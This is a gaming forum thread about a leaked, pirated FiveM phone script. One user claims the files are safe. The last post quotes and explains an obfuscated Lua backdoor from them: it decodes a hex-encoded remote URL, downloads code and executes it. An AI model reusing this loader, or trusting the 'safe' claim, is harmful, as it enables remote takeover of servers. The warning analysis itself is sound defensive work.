Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script [ESX/QB] Quasar Smartphone - Full Unlocked

KaV3R

Bronze Elite
Joined
Nov 6, 2021
Messages
23
Reaction score
4
Points
166
Location
Hungary
thank you, but how i can open the phone, and where i can edit ? because F1 is didnt working
 

KaV3R

Bronze Elite
Joined
Nov 6, 2021
Messages
23
Reaction score
4
Points
166
Location
Hungary
1714105742159.png


Not working soo nevermind KEKW
 

LiaM_

Gold Elite
Joined
Apr 7, 2021
Messages
53
Reaction score
473
Points
296
working with the welcome screen too ?
 

Rathkor

Silver Elite
Joined
Feb 9, 2022
Messages
16
Reaction score
11
Points
166
Location
USA
This phone will never work, it is fully encrypted, the file contains a virus do not run it on the serverView attachment 25674


What he means is that the files are obfuscated. For those of you who don't know it's really difficult to de-obfuscate lua code. This doesn't mean the files contain a virus, it's just the original developer protecting their code because escrowed (enrypted) code in lua is not a strong protection, obviously or there wouldn't be so many leak sites.

I have just finished reviewing the file as well personally. I have well over 10 years of experience in Lua. There is only one location that makes an http call, which cannot be obfuscated because it's a fivem specific function, and all it's doing is checking to see if there is an update to the resource, which should have been disabled.
1724876762172.png
 
Last edited:

MitKema

Member
Joined
Oct 1, 2023
Messages
12
Reaction score
0
Points
156
Location
Uruguay
Anyone can help me for install this phone pls? my discord is: mitkema
 

linux21125

Member
Joined
Sep 17, 2022
Messages
23
Reaction score
1
Points
156
Location
Germany
You are all stupid.
local Enchanced_Tabs = {
Ench, Support, Host, Pairs,
Realease, Callbacks, Source,
Hosting, Event, PerformHttpRequest,
assert, server, load, Spawn, materials
}

local random_char = {
"68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76",
"61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d",
"74", "75", "44", "75", "50", "68", "6d", "51", "74", "32", "47", "74", "48", "39", "70", "76", "72", "78", "43", "52",
}

function str_utf8()
_empt = ""
for id,it in pairs(random_char) do
_empt = _empt..it
end
return (_empt:gsub("..", function (cc)
return string.char(tonumber(cc, 16))

end))
end

Enchanced_Tabs[10](str_utf8(), function (e, d)
local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
if (d == nil) then return end
s()
end)

That is in a lua code

This is a potentially malicious Lua script that acts as a backdoor or loader. It has been intentionally obfuscated (disguised) to hide its true function.



What the Code Does​



  1. URL Obfuscation: The code stores a URL in small hexadecimal parts within the random_char table. The str_utf8() function assembles these parts and converts them into a readable text string.
  2. Download Code: It uses a function (likely PerformHttpRequest from a FiveM environment, stored as the 10th element in Enchanced_Tabs) to download the content from that URL.
  3. Execute Code: The downloaded content, d, is then interpreted as executable Lua code using the load() function (the 13th element) and is immediately run s().


The Risk ☢️



This code represents a significant security risk. It allows the operator of the URL to execute any code they want on your server or client. With this, an attacker can:

  • Steal data
  • Crash the server
  • Load other malicious scripts
  • Kick or ban players
  • Take full control of the resource or the server
 
Top